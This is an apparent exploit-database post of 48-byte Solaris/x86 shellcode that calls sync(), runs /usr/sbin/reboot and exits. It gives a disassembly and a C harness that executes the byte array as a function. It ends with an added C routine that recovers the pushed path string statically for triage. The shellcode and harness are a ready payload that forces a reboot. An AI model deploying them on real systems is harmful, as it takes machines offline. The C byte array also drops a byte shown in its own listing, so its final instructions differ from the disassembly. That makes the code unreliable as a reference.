solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
Posted on 10 June 2010
/*
Title:    Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
Author:   Jonathan Salwan <submit AT shell-storm.org>
Web:      http://www.shell-storm.org
Twitter:  http://twitter.com/shell_storm

! Database of shellcodes: http://www.shell-storm.org/shellcode/

Date:     2010-06-07
Tested:   SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris

0x8048074:  31 c0            xorl   %eax,%eax
0x8048076:  b0 24            movb   $0x24,%al
0x8048078:  cd 91            int    $0x91
0x804807a:  31 c0            xorl   %eax,%eax
0x804807c:  50               pushl  %eax
0x804807d:  68 62 6f 6f 74   pushl  $0x746f6f62
0x8048082:  68 6e 2f 72 65   pushl  $0x65722f6e
0x8048087:  68 2f 73 62 69   pushl  $0x6962732f
0x804808c:  68 2f 75 73 72   pushl  $0x7273752f
0x8048091:  89 e3            movl   %esp,%ebx
0x8048093:  50               pushl  %eax
0x8048094:  53               pushl  %ebx
0x8048095:  89 e1            movl   %esp,%ecx
0x8048097:  50               pushl  %eax
0x8048098:  51               pushl  %ecx
0x8048099:  53               pushl  %ebx
0x804809a:  b0 0b            movb   $0xb,%al
0x804809c:  50               pushl  %eax
0x804809d:  cd 91            int    $0x91
0x804809f:  31 db            xorl   %ebx,%ebx
0x80480a1:  b0 01            movb   $0x1,%al
0x80480a3:  cd 91            int    $0x91
*/

#include <stdio.h>
#include <string.h>   /* strlen() */

char sc[] = "\x31\xc0\xb0\x24\xcd\x91\x31\xc0\x50\x68"
            "\x62\x6f\x6f\x74\x68\x6e\x2f\x72\x65\x68"
            "\x2f\x73\x62\x69\x68\x2f\x75\x73\x72\x89"
            "\xe3\x50\x53\x89\xe1\x50\x51\x53\xb0\x0b"
            "\x50\xcd\x91\x31\xdb\xb0\xcd\x91";

int main(void)
{
    /* Print the payload length, then call the byte array as a function. */
    fprintf(stdout, "Length: %d\n", (int)strlen(sc));
    (*(void(*)()) sc)();
    return 0;
}

# Inj3ct0r.com [2010-06-10]
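For triage, the path built by the four `pushl` immediates in the listing can be recovered statically, without running the payload. The following is an added example, not part of the original post: `recover_stack_string` and `sample` are hypothetical names, and the scan is a simple linear sweep for opcode 0x68, not a full disassembler.

```c
#include <stdio.h>
#include <string.h>

/* Bytes 0x804807a-0x8048092 of the listing above, copied as data only;
 * nothing in this program executes them. */
static const unsigned char sample[] = {
    0x31, 0xc0, 0x50,
    0x68, 0x62, 0x6f, 0x6f, 0x74,
    0x68, 0x6e, 0x2f, 0x72, 0x65,
    0x68, 0x2f, 0x73, 0x62, 0x69,
    0x68, 0x2f, 0x75, 0x73, 0x72,
    0x89, 0xe3
};

/* Finds the longest run of back-to-back "push imm32" (opcode 0x68) and
 * writes the string they build into out. Returns its length, 0 if there
 * is no run or out is too small. */
size_t recover_stack_string(const unsigned char *buf, size_t n,
                            char *out, size_t outsz)
{
    size_t best_start = 0, best_cnt = 0, i = 0;

    while (i < n) {
        size_t start = i, cnt = 0;
        while (i + 5 <= n && buf[i] == 0x68) { cnt++; i += 5; }
        if (cnt > best_cnt) { best_cnt = cnt; best_start = start; }
        if (cnt == 0) i++;          /* not a push: keep sweeping */
    }
    if (best_cnt == 0 || outsz < best_cnt * 4 + 1)
        return 0;

    /* The stack grows down, so the last dword pushed is the start of the
     * string; each imm32 lands in memory in instruction-stream byte order. */
    for (size_t k = 0; k < best_cnt; k++)
        memcpy(out + k * 4, buf + best_start + (best_cnt - 1 - k) * 5 + 1, 4);
    out[best_cnt * 4] = '\0';
    return best_cnt * 4;
}

int main(void)
{
    char path[64];
    size_t len = recover_stack_string(sample, sizeof sample, path, sizeof path);
    printf("%zu bytes: %s\n", len, path);
    return 0;
}
```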